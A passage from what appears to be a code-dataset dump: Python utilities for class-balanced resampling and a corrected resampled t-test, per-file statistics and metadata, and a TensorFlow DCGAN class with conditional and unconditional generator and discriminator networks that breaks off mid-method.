    :return: (list_subjects, list_sessions, list_diagnoses) of the balanced data.
    :raises Exception: if the two groups already have equal size.
    :raises OSError/IOError: propagated from pandas if the TSV cannot be read.
    """
    from collections import Counter
    import os

    diagnoses = pd.io.parsers.read_csv(diagnoses_tsv, sep='\t')
    print('Do random subsampling the majority group to number of subjects of minority group:')
    counts = Counter(list(diagnoses.diagnosis))
    # NOTE(review): assumes exactly two diagnosis labels; with more than two,
    # only the first two (in arbitrary dict order) are compared — same as before.
    labels = list(counts.keys())
    label1, label2 = labels[0], labels[1]
    count_label1 = counts[label1]
    count_label2 = counts[label2]

    if count_label1 == count_label2:
        raise Exception("""The data is balanced already, please deactivate the balanced_down_sample flag""")

    # Identify the majority label and how many of its rows must be dropped.
    if count_label1 < count_label2:
        majority_label = label2
        n_to_drop = count_label2 - count_label1
    else:
        majority_label = label1
        n_to_drop = count_label1 - count_label2
    print('%s is the majority group and will be randomly downsampled.' % majority_label)

    majority_df_index = diagnoses.index[diagnoses['diagnosis'] == majority_label]
    drop_index = np.random.choice(majority_df_index, n_to_drop, replace=False)
    diagnoses_balanced = diagnoses.drop(drop_index)

    # Save the balanced tsv next to the input, unless it was written previously.
    stem = os.path.basename(diagnoses_tsv).split('.')[0]
    if n is None:
        out_name = stem + '_balanced.tsv'
    else:
        out_name = stem + '_' + str(n) + '_balanced.tsv'
    out_tsv = os.path.join(os.path.dirname(diagnoses_tsv), out_name)
    if not os.path.isfile(out_tsv):
        diagnoses_balanced.to_csv(out_tsv, sep='\t', index=False)

    list_diagnoses = list(diagnoses_balanced.diagnosis)
    list_subjects = list(diagnoses_balanced.participant_id)
    list_sessions = list(diagnoses_balanced.session_id)
    return list_subjects, list_sessions, list_diagnoses
def _downsample_majority(diagnoses, indices, subset_name, n_iteration):
    """Randomly drop majority-diagnosis rows from ``indices`` so both groups are equal-sized.

    :param diagnoses: DataFrame with a ``diagnosis`` column (default RangeIndex assumed,
        so positional and label indexing coincide — TODO confirm against callers).
    :param indices: iterable of row indices (one stratified train or test fold).
    :param subset_name: 'training' or 'test', used only in the log message.
    :param n_iteration: current split number, used only in the log message.
    :return: (balanced_indices ndarray, dropped_indices ndarray).
    :raises Exception: if the two groups are already the same size.
    """
    import numpy as np
    from collections import Counter

    counts = Counter(diagnoses.diagnosis[indices])
    # list() around keys(): dict views are not indexable under Python 3.
    labels = list(counts.keys())
    label1, label2 = labels[0], labels[1]
    count_label1 = counts[label1]
    count_label2 = counts[label2]
    # Mirror the original grouping: everything that is not label2 counts as group 1.
    group1 = [i for i in indices if diagnoses.diagnosis[i] != label2]
    group2 = [i for i in indices if diagnoses.diagnosis[i] == label2]
    if count_label1 < count_label2:
        print('In %s data for iteration %d, %s is the majority group and will be randomly downsampled.' % (subset_name, n_iteration, label2))
        drop_index = np.random.choice(group2, count_label2 - count_label1, replace=False)
    elif count_label1 > count_label2:
        print('In %s data for iteration %d, %s is the majority group and will be randomly downsampled.' % (subset_name, n_iteration, label1))
        drop_index = np.random.choice(group1, count_label1 - count_label2, replace=False)
    else:
        raise Exception("""The data is balanced already, please deactivate the balanced_down_sample flag""")
    balanced = np.asarray([item for item in indices if item not in drop_index])
    return balanced, drop_index
def split_subjects_to_pickle(diagnoses_tsv, n_iterations=250, test_size=0.2, balanced=False):
    """Create (or reload) stratified shuffle-split train/test indices for a diagnoses TSV.

    The splits are cached in a pickle next to ``diagnoses_tsv`` so repeated runs
    reuse the same shuffle. With ``balanced=True`` the majority diagnosis group is
    randomly downsampled to the minority size in every fold, and each balanced
    fold is additionally saved as a ``*_<iteration>_balanced.tsv`` file.

    :param diagnoses_tsv: path to a tab-separated file with a ``diagnosis`` column.
    :param n_iterations: number of StratifiedShuffleSplit repetitions.
    :param test_size: fraction of subjects assigned to the test fold.
    :param balanced: if True, downsample the majority group per fold.
    :return: (splits_indices, splits_indices_pickle) — list of (train, test)
        index-array pairs and the path of the cache pickle.
    :raises Exception: if the TSV lacks a ``diagnosis`` column.
    """
    from os import path
    import pandas as pd
    import numpy as np
    from sklearn.model_selection import StratifiedShuffleSplit
    import pickle

    diagnoses = pd.io.parsers.read_csv(diagnoses_tsv, sep='\t')
    if 'diagnosis' not in list(diagnoses.columns.values):
        raise Exception('Diagnoses file is not in the correct format.')
    diagnoses_list = list(diagnoses.diagnosis)
    unique = list(set(diagnoses_list))
    # Encode diagnoses as integer class labels for stratification.
    y = np.array([unique.index(x) for x in diagnoses_list])
    suffix = '_balanced.pkl' if balanced else '.pkl'
    splits_indices_pickle = path.join(path.dirname(diagnoses_tsv),
                                      path.basename(diagnoses_tsv).split('.')[0] + suffix)
    if path.isfile(splits_indices_pickle):
        # Reuse the cached shuffle so repeated runs see identical splits.
        with open(splits_indices_pickle, 'rb') as f:
            splits_indices = pickle.load(f)
    else:
        splits = StratifiedShuffleSplit(n_splits=n_iterations, test_size=test_size)
        if not balanced:
            splits_indices = list(splits.split(np.zeros(len(y)), y))
        else:
            print('Do random subsampling the majority group to number of subjects of minority group:')
            splits_indices = []
            n_iteration = 0
            for train_index, test_index in splits.split(np.zeros(len(y)), y):
                train_index_balanced, drop_index_train = _downsample_majority(
                    diagnoses, train_index, 'training', n_iteration)
                test_index_balanced, drop_index_test = _downsample_majority(
                    diagnoses, test_index, 'test', n_iteration)
                n_iteration += 1
                splits_indices.append((train_index_balanced, test_index_balanced))
                # Save this fold's balanced subject list next to the input
                # (iteration number in the filename is 1-based, matching the original).
                diagnoses_balanced_tsv = diagnoses.drop(np.append(drop_index_train, drop_index_test))
                diagnoses_balanced_tsv.to_csv(
                    path.join(path.dirname(diagnoses_tsv),
                              path.basename(diagnoses_tsv).split('.')[0] + '_' + str(n_iteration) + '_balanced.tsv'),
                    sep='\t', index=False)
        with open(splits_indices_pickle, 'wb') as s:
            pickle.dump(splits_indices, s)
    return splits_indices, splits_indices_pickle
def compute_t(subjects_1_tsv, subjects_2_tsv, test_size=0.2):
    """
    Compute the resampled and the corrected resampled paired t-test (Nadeau and Bengio, 2003)
    between two classifiers evaluated on the same repeated train/test splits.
    Also please refer this post to understand the different metrics used to compare two classifiers (https://stats.stackexchange.com/questions/217466/for-model-selection-comparison-what-kind-of-test-should-i-use)
    Also, please refer the package mlxtend.evaluate, but they did not include the corrected resampled paired t-test
    :param subjects_1_tsv: tsv for classifier 1 with columns ``iteration``, ``y`` and ``y_hat``,
        rows grouped contiguously by iteration with the same number of subjects per iteration
        (assumed — TODO confirm against the file producer).
    :param subjects_2_tsv: same format for classifier 2, rows aligned with subjects_1_tsv.
    :param test_size: test fraction used when the splits were generated; enters the
        variance-correction term of the corrected test.
    :return: (resampled_t, resampled_p_value, corrected_resampled_t, corrected_resampled_p_value)
    """
    subjects_1 = pd.io.parsers.read_csv(subjects_1_tsv, sep='\t')
    subjects_2 = pd.io.parsers.read_csv(subjects_2_tsv, sep='\t')
    num_split = len(subjects_1.iteration.unique())
    # Integer division (//): each split holds the same whole number of subjects;
    # plain / would give a float under Python 3 and break the slicing below.
    n_subj = subjects_1.shape[0] // num_split
    test_error_split = np.zeros((num_split, 1))  # mu_j hat for j = 1 to J
    # Per-subject correctness indicators for each classifier.
    q1 = (subjects_1.y == subjects_1.y_hat) * 1.0
    q2 = (subjects_2.y == subjects_2.y_hat) * 1.0
    diff = q1 - q2
    for i in range(num_split):
        test_error_split[i] = np.mean(diff[(i * n_subj):((i + 1) * n_subj)])
    # compute mu_{n_1}^{n_2}
    average_test_error = np.mean(test_error_split)
    # compute S2_{mu_J}
    approx_variance = np.sum((test_error_split - average_test_error) ** 2)
    resampled_t = average_test_error * np.sqrt(num_split) / np.sqrt(approx_variance / (num_split - 1))
    resampled_p_value = stats.t.sf(np.abs(resampled_t), num_split - 1) * 2.
    # 1.0 / (num_split - 1): forced float division — under Python 2 the original
    # 1 / (num_split - 1) was integer division, i.e. always 0, silently dropping
    # the 1/J term of the Nadeau-Bengio correction.
    corrected_resampled_t = average_test_error * np.sqrt(num_split) / np.sqrt(
        (test_size / (1 - test_size) + 1.0 / (num_split - 1)) * approx_variance)
    corrected_resampled_p_value = stats.t.sf(np.abs(corrected_resampled_t), num_split - 1) * 2.
    return resampled_t, resampled_p_value, corrected_resampled_t, corrected_resampled_p_value
| 57.95706
| 212
| 0.537955
| 9,513
| 79,633
| 4.322086
| 0.04867
| 0.046308
| 0.015809
| 0.029186
| 0.905098
| 0.895734
| 0.885227
| 0.876277
| 0.870294
| 0.867862
| 0
| 0.033055
| 0.351136
| 79,633
| 1,373
| 213
| 57.999272
| 0.762672
| 0.070561
| 0
| 0.846154
| 0
| 0
| 0.082009
| 0.002221
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004869
| 0.0185
| null | null | 0.04187
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2f7e2752c1da36063e3bbfe4a1e108d57793d3d
| 20,992
|
py
|
Python
|
Model/DCGAN.py
|
Wenyuan-Vincent-Li/DCGAN
|
a3a7b6eebefe98a8cab3c4512041f116e0a90b5b
|
[
"MIT"
] | 1
|
2019-01-28T00:10:45.000Z
|
2019-01-28T00:10:45.000Z
|
Model/DCGAN.py
|
Wenyuan-Vincent-Li/DCGAN
|
a3a7b6eebefe98a8cab3c4512041f116e0a90b5b
|
[
"MIT"
] | null | null | null |
Model/DCGAN.py
|
Wenyuan-Vincent-Li/DCGAN
|
a3a7b6eebefe98a8cab3c4512041f116e0a90b5b
|
[
"MIT"
] | null | null | null |
import sys, os
# Make the repository root importable whether the script is launched from the
# repo root (a directory named "DCGAN") or from one level inside it.
# NOTE(review): this depends on the current working directory, not on __file__ —
# launching from anywhere else leaves `Model` unimportable; confirm intended.
if os.getcwd().endswith("DCGAN"):
    root_dir = os.getcwd()
else:
    root_dir = os.path.dirname(os.getcwd())
sys.path.append(root_dir)
import tensorflow as tf
from Model import model_base
class DCGAN(model_base.GAN_Base):
    """DCGAN generator/discriminator graphs built on the conv/deconv/batch-norm
    helpers of ``model_base.GAN_Base``.

    Which architecture branch is built is driven entirely by ``config``:
    ``Y_LABEL`` (conditional vs unconditional), ``CHANNEL`` / ``DATA_NAME``
    (mnist-style 1-channel vs 64x64 3-channel "prostate" nets), ``LOSS``
    (MRGAN / PacGAN variants) and ``MINIBATCH_DIS``.
    """
    def __init__(self, config):
        # Base class consumes the data format and batch-norm hyper-parameters.
        super(DCGAN, self).__init__(config.DATA_FORMAT, \
        config.BATCH_NORM_DECAY, config.BATCH_NORM_EPSILON)
        self.config = config
    def mrGAN_encoder(self, image, reuse = False):
        """Mode-regularized-GAN encoder: maps an image batch back to a 100-d latent code.

        :param image: input image tensor (batch of generated or real images).
        :param reuse: reuse the "encoder" variable scope on repeated calls.
        :return: [BATCH_SIZE, 100] latent tensor — tanh-squashed in the 3-channel
            branch, unbounded in the 1-channel branch.
        """
        with tf.variable_scope("encoder") as scope:
            if reuse:
                scope.reuse_variables()
            if self.config.CHANNEL == 3:
                h0 = self._conv2d(image, 64, name = 'e_h0_conv')
                h0 = tf.nn.leaky_relu(h0)
                h1 = self._conv2d(h0, 64 * 2, name = 'e_h1_conv')
                # NOTE(review): batch-norm scope names 'd_h1_bn'/'d_h2_bn' look
                # copy-pasted from the discriminator; harmless inside the
                # "encoder" variable scope, but renaming them now would break
                # existing checkpoints — confirm before touching.
                h1 = self._batch_norm_contrib(h1, name = 'd_h1_bn', train = True)
                h1 = tf.nn.leaky_relu(h1)
                h2 = self._conv2d(h1, 64 * 4, name = 'e_h2_conv')
                h2 = self._batch_norm_contrib(h2, name = 'd_h2_bn', train = True)
                h2 = tf.nn.leaky_relu(h2)
                h3 = self._conv2d(h2, 64 * 8, name = 'e_h3_conv')
                h3 = self._batch_norm_contrib(h3, name = 'e_h3_bn', train = True)
                h3 = tf.nn.leaky_relu(h3)
                h4 = tf.reshape(h3, [self.config.BATCH_SIZE, -1])
                h4 = self._linear_fc(h4, 100, 'e_h4_lin')
                return tf.tanh(h4)
            else:
                # first conv
                h0 = self._conv2d(image, 1 + self.config.NUM_CLASSES, name = 'e_h0_conv')
                h0 = tf.nn.leaky_relu(h0, alpha = 0.2, name = 'e_leaky0')
                # second conv
                h1 = self._conv2d(h0, 64 + self.config.NUM_CLASSES, name = 'e_h1_conv')
                h1 = self._batch_norm_contrib(h1, name = 'e_h1_bn', train = True)
                h1 = tf.nn.leaky_relu(h1, alpha = 0.2, name = 'e_leaky1')
                # reshape and concat the label
                h1 = tf.reshape(h1, [self.config.BATCH_SIZE, -1])
                ## fc layer
                h2 = self._linear_fc(h1, 1024, 'e_h2_lin')
                h2 = self._batch_norm_contrib(h2, name = 'e_h2_bn', train = True)
                h2= tf.nn.leaky_relu(h2, alpha = 0.2, name = 'e_leaky2')
                h3 = self._linear_fc(h2, 100, 'e_h3_lin')
                return h3
    def generator(self, z, y = None, reuse = False):
        """Build the generator graph (training mode: batch norm with train=True).

        :param z: latent noise tensor.
        :param y: one-hot label tensor, used only when config.Y_LABEL is set.
        :param reuse: reuse the "generator" variable scope on repeated calls.
        :return: generated image batch — sigmoid output for the mnist-style
            branches, tanh output for the 64x64 branches.
        """
        with tf.variable_scope("generator") as scope:
            if reuse:
                scope.reuse_variables()
            if not self.config.Y_LABEL: ## there is no y, don't use conditional GAN
                if self.config.CHANNEL == 1:
                    ## first linear layer
                    h0 = self._linear_fc(z, 1024, 'g_h0_lin')
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
                    h0 = tf.nn.relu(h0, 'g_rl0')
                    ## second linear layer
                    # NOTE(review): output width BATCH_SIZE * 2 * 7 * 7 only matches the
                    # [BATCH_SIZE, 7, 7, 64*2] reshape below when BATCH_SIZE == 64 —
                    # presumably meant 64 * 2 * 7 * 7; confirm before changing.
                    h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
                    h1 = tf.nn.relu(h1, 'g_rl1')
                    ## reshape to conv feature pack and concat with label condition
                    h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
                    ## first layer deconv
                    h2 = self._deconv2d(h1, 128, name='g_dconv0')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
                    h2 = tf.nn.relu(h2, 'g_rl2')
                    ## output layer: sigmoid to map the data range to [0, 1]
                    h3 = self._deconv2d(h2, 1, name='g_dconv1')
                    h3 = tf.nn.sigmoid(h3, name='sigmoid')
                    return h3
                else:
                    # project 'z' and reshape
                    z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
                    h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train = True)
                    h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
                    h1 = self._deconv2d(h0, 64 * 4, name = 'g_dconv0')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train = True)
                    h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
                    h2 = self._deconv2d(h1, 64 * 2, name = 'g_dconv1')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train = True)
                    h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
                    h3 = self._deconv2d(h2, 64 * 1, name = 'g_dconv2')
                    h3 = self._batch_norm_contrib(h3, 'g_bn3', train = True)
                    h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
                    h4 = self._deconv2d(h3, self.config.CHANNEL, name = 'g_dconv3')
                    h4 = tf.nn.tanh(h4)
                    ## [64, 64]
                    return h4
            else: ## use conditional GAN
                if self.config.DATA_NAME == "mnist":
                    yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES]) ## [None, 1, 1, 10]
                    z = tf.concat([z, y], 1) # concat the z and y in the latent space
                    ## first linear layer
                    h0 = self._linear_fc(z, 1024, 'g_h0_lin')
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train = True)
                    h0 = tf.nn.relu(h0, 'g_rl0')
                    h0 = tf.concat([h0, y], 1)
                    ## second linear layer
                    h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train = True)
                    h1 = tf.nn.relu(h1, 'g_rl1')
                    ## reshape to conv feature pack and concat with label condition
                    h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
                    h1 = self._conv_cond_concat(h1, yb)
                    ## first layer deconv
                    h2 = self._deconv2d(h1, 128, name = 'g_dconv0')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train = True)
                    h2 = tf.nn.relu(h2, 'g_rl2')
                    h2 = self._conv_cond_concat(h2, yb)
                    ## output layer: sigmoid to map the data range to [0, 1]
                    h3 = self._deconv2d(h2, 1, name = 'g_dconv1')
                    h3 = tf.nn.sigmoid(h3, name = 'sigmoid')
                    return h3
                elif self.config.DATA_NAME == "prostate":
                    # project 'z' and reshape; label map yb is concatenated at every scale
                    yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
                    z = tf.concat([z, y], 1)
                    z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
                    h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
                    h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
                    h0 = self._conv_cond_concat(h0, yb)
                    h1 = self._deconv2d(h0, 64 * 4, name='g_dconv0')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
                    h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
                    h1 = self._conv_cond_concat(h1, yb)
                    h2 = self._deconv2d(h1, 64 * 2, name='g_dconv1')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
                    h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
                    h2 = self._conv_cond_concat(h2, yb)
                    h3 = self._deconv2d(h2, 64 * 1, name='g_dconv2')
                    h3 = self._batch_norm_contrib(h3, 'g_bn3', train=True)
                    h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
                    h3 = self._conv_cond_concat(h3, yb)
                    h4 = self._deconv2d(h3, 3, name='g_dconv3')
                    h4 = tf.nn.tanh(h4)
                    ## [64, 64]
                    return h4
    def discriminator(self, image, y = None, reuse = False):
        """Build the discriminator graph.

        :param image: image batch (real or generated); noise is added first.
        :param y: one-hot label tensor, used only when config.Y_LABEL is set.
        :param reuse: reuse the "discriminator" variable scope (second/third calls).
        :return: (sigmoid probability, raw logits, feature-matching tensor fm
            taken from an intermediate layer).
        """
        with tf.variable_scope("discriminator") as scope:
            if reuse:
                scope.reuse_variables()
            if not self.config.Y_LABEL:
                if self.config.CHANNEL == 3:
                    image = self._add_noise(image)
                    h0 = self._conv2d(image, 64, name = 'd_h0_conv')
                    h0 = tf.nn.leaky_relu(h0)
                    h1 = self._conv2d(h0, 64 * 2, name = 'd_h1_conv')
                    h1 = self._batch_norm_contrib(h1, name = 'd_h1_bn', train = True)
                    h1 = tf.nn.leaky_relu(h1)
                    h2 = self._conv2d(h1, 64 * 4, name = 'd_h2_conv')
                    h2 = self._batch_norm_contrib(h2, name = 'd_h2_bn', train = True)
                    h2 = tf.nn.leaky_relu(h2)
                    h3 = self._conv2d(h2, 64 * 8, name = 'd_h3_conv')
                    h3 = self._batch_norm_contrib(h3, name = 'd_h3_bn', train = True)
                    h3 = tf.nn.leaky_relu(h3)
                    # keep last conv activations for feature matching
                    fm = h3
                    h4 = tf.reshape(h3, [self.config.BATCH_SIZE, -1])
                    if self.config.MINIBATCH_DIS:
                        f = self._minibatch_discrimination(h4, 100)
                        h4 = tf.concat([h4, f], 1)
                    h4 = self._linear_fc(h4, 1, 'd_h4_lin')
                    return tf.nn.sigmoid(h4), h4, fm
                else:
                    image = self._add_noise(image)
                    # first conv
                    h0 = self._conv2d(image, 1 + self.config.NUM_CLASSES, name='d_h0_conv')
                    h0 = tf.nn.leaky_relu(h0, alpha=0.2, name='d_leaky0')
                    # second conv
                    h1 = self._conv2d(h0, 64 + self.config.NUM_CLASSES, name='d_h1_conv')
                    h1 = self._batch_norm_contrib(h1, name='d_h1_bn', train=True)
                    h1 = tf.nn.leaky_relu(h1, alpha=0.2, name='d_leaky1')
                    # keep second conv activations for feature matching
                    fm = h1
                    # reshape and concat the label
                    h1 = tf.reshape(h1, [self.config.BATCH_SIZE, -1])
                    ## fc layer
                    h2 = self._linear_fc(h1, 1024, 'd_h2_lin')
                    h2 = self._batch_norm_contrib(h2, name='d_h2_bn', train=True)
                    h2 = tf.nn.leaky_relu(h2, alpha=0.2, name='d_leaky2')
                    if self.config.MINIBATCH_DIS:
                        f = self._minibatch_discrimination(h2, 100)
                        h2 = tf.concat([h2, f], 1)
                    h3 = self._linear_fc(h2, 1, 'd_h3_lin')
                    return tf.nn.sigmoid(h3), h3, fm
            else:
                if self.config.DATA_NAME == "mnist":
                    image = self._add_noise(image)
                    yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
                    image = self._conv_cond_concat(image, yb)
                    # first conv
                    h0 = self._conv2d(image, 1 + self.config.NUM_CLASSES, name = 'd_h0_conv')
                    h0 = tf.nn.leaky_relu(h0, alpha = 0.2, name = 'd_leaky0')
                    h0 = self._conv_cond_concat(h0, yb)
                    # second conv
                    h1 = self._conv2d(h0, 64 + self.config.NUM_CLASSES, name = 'd_h1_conv')
                    h1 = self._batch_norm_contrib(h1, name = 'd_h1_bn', train = True)
                    h1 = tf.nn.leaky_relu(h1, alpha = 0.2, name = 'd_leaky1')
                    # keep second conv activations for feature matching
                    fm = h1
                    # reshape and concat the label
                    h1 = tf.reshape(h1, [self.config.BATCH_SIZE, -1])
                    h1 = tf.concat([h1, y], 1)
                    ## fc layer
                    h2 = self._linear_fc(h1, 1024, 'd_h2_lin')
                    h2 = self._batch_norm_contrib(h2, name = 'd_h2_bn', train = True)
                    h2= tf.nn.leaky_relu(h2, alpha = 0.2, name = 'd_leaky2')
                    h2 = tf.concat([h2, y], 1)
                    if self.config.MINIBATCH_DIS:
                        f = self._minibatch_discrimination(h2, 100)
                        h2 = tf.concat([h2, f], 1)
                    h3 = self._linear_fc(h2, 1, 'd_h3_lin')
                    return tf.nn.sigmoid(h3), h3, fm
                elif self.config.DATA_NAME == "prostate":
                    image = self._add_noise(image)
                    yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
                    image = self._conv_cond_concat(image, yb)
                    h0 = self._conv2d(image, 64, name='d_h0_conv')
                    h0 = tf.nn.leaky_relu(h0)
                    h0 = self._conv_cond_concat(h0, yb)
                    h1 = self._conv2d(h0, 64 * 2, name='d_h1_conv')
                    h1 = self._batch_norm_contrib(h1, name='d_h1_bn', train=True)
                    h1 = tf.nn.leaky_relu(h1)
                    h1 = self._conv_cond_concat(h1, yb)
                    h2 = self._conv2d(h1, 64 * 4, name='d_h2_conv')
                    h2 = self._batch_norm_contrib(h2, name='d_h2_bn', train=True)
                    h2 = tf.nn.leaky_relu(h2)
                    h2 = self._conv_cond_concat(h2, yb)
                    h3 = self._conv2d(h2, 64 * 8, name='d_h3_conv')
                    h3 = self._batch_norm_contrib(h3, name='d_h3_bn', train=True)
                    h3 = tf.nn.leaky_relu(h3)
                    # keep last conv activations (pre label concat) for feature matching
                    fm = h3
                    h3 = self._conv_cond_concat(h3, yb)
                    h4 = tf.reshape(h3, [self.config.BATCH_SIZE, -1])
                    if self.config.MINIBATCH_DIS:
                        f = self._minibatch_discrimination(h4, 100)
                        h4 = tf.concat([h4, f], 1)
                    h4 = tf.concat([h4, y], 1)
                    h4 = self._linear_fc(h4, 1, 'd_h4_lin')
                    return tf.nn.sigmoid(h4), h4, fm
    def forward_pass(self, z, image, label = None):
        """Wire generator and discriminator together for one training step.

        Branches on config.LOSS: MRGAN additionally encodes G's output and
        re-generates it; PacGAN generates PAC_NUM samples and packs them along
        the channel axis before discrimination.

        :param z: latent variable (a list of PAC_NUM tensors when LOSS == "PacGAN")
        :param image: input image
        :param label: input label (e.g. mnist)
        :return: generator output(s) plus discriminator probabilities, logits and
            feature-matching tensors for real and fake inputs (and the MR branch
            when LOSS == "MRGAN").
        """
        if self.config.LOSS == "MRGAN":
            G = self.generator(z, label)
            G_mr = self.generator(self.mrGAN_encoder(G), label, reuse = True)
            D, D_logits, fm = self.discriminator(image, label, reuse = False)
            D_, D_logits_, fm_ = self.discriminator(G, label, reuse = True)
            D_mr, D_mr_logits, fm_mr = self.discriminator(G_mr, label, reuse = True)
            return G, G_mr, D, D_logits, D_, D_logits_, fm, fm_, D_mr, D_mr_logits, fm_mr
        else:
            if self.config.LOSS == "PacGAN":
                G_sep = []
                for i in range(self.config.PAC_NUM):
                    # reuse generator variables after the first packed sample
                    reuse = True if i > 0 else False
                    G_sep.append(self.generator(z[i], label, reuse))
                G = tf.concat(G_sep, 3)
            else:
                G = self.generator(z, label)
            D, D_logits, fm = self.discriminator(image, label, reuse = False)
            D_, D_logits_, fm_ = self.discriminator(G, label, reuse = True)
            return G, D, D_logits, D_, D_logits_, fm, fm_
    def sampler(self, z, y = None):
        """Rebuild the generator under AUTO_REUSE for sampling images.

        Mirrors ``generator`` layer-for-layer so it shares variables with it.

        :param z: latent noise tensor.
        :param y: one-hot label tensor when config.Y_LABEL is set.
        :return: generated image batch.
        """
        with tf.variable_scope("generator", reuse = tf.AUTO_REUSE) as scope:
            if not self.config.Y_LABEL:
                tf.logging.info("Apply unconditional GAN!")
                if self.config.CHANNEL == 3:
                    # project 'z' and reshape; inference mode: batch norm train=False
                    z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
                    h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train = False)
                    h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
                    h1 = self._deconv2d(h0, 64 * 4, name='g_dconv0')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train = False)
                    h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
                    h2 = self._deconv2d(h1, 64 * 2, name='g_dconv1')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train = False)
                    h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
                    h3 = self._deconv2d(h2, 64 * 1, name='g_dconv2')
                    h3 = self._batch_norm_contrib(h3, 'g_bn3', train = False)
                    h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
                    h4 = self._deconv2d(h3, self.config.CHANNEL, name='g_dconv3')
                    h4 = tf.nn.tanh(h4)
                    ## [64, 64]
                    return h4
                else:
                    ## first linear layer
                    # NOTE(review): this branch (and the conditional "prostate" branch
                    # below) passes train=True to batch norm, unlike the CHANNEL==3
                    # branch above which uses train=False for sampling — presumably an
                    # oversight; confirm intended behavior before changing.
                    h0 = self._linear_fc(z, 1024, 'g_h0_lin')
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
                    h0 = tf.nn.relu(h0, 'g_rl0')
                    ## second linear layer
                    h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
                    h1 = tf.nn.relu(h1, 'g_rl1')
                    ## reshape to conv feature pack and concat with label condition
                    h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
                    ## first layer deconv
                    h2 = self._deconv2d(h1, 128, name='g_dconv0')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
                    h2 = tf.nn.relu(h2, 'g_rl2')
                    ## output layer: sigmoid to map the data range to [0, 1]
                    h3 = self._deconv2d(h2, 1, name='g_dconv1')
                    h3 = tf.nn.sigmoid(h3, name='sigmoid')
                    return h3
            else:
                tf.logging.info("Apply conditional GAN!")
                if self.config.DATA_NAME == "mnist":
                    yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES]) ## [None, 1, 1, 10]
                    z = tf.concat([z, y], 1) # concat the z and y in the latent space
                    ## first linear layer
                    h0 = self._linear_fc(z, 1024, 'g_h0_lin')
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train = False)
                    h0 = tf.nn.relu(h0, 'g_rl0')
                    h0 = tf.concat([h0, y], 1)
                    ## second linear layer
                    h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train = False)
                    h1 = tf.nn.relu(h1, 'g_rl1')
                    ## reshape to conv feature pack and concat with label condition
                    h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
                    h1 = self._conv_cond_concat(h1, yb)
                    ## first layer deconv
                    h2 = self._deconv2d(h1, 128, name='g_dconv0')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train = False)
                    h2 = tf.nn.relu(h2, 'g_rl2')
                    h2 = self._conv_cond_concat(h2, yb)
                    ## output layer: sigmoid to map the data range to [0, 1]
                    h3 = self._deconv2d(h2, 1, name='g_dconv1')
                    h3 = tf.nn.sigmoid(h3, name='sigmoid')
                    return h3
                elif self.config.DATA_NAME == "prostate":
                    # project 'z' and reshape
                    yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
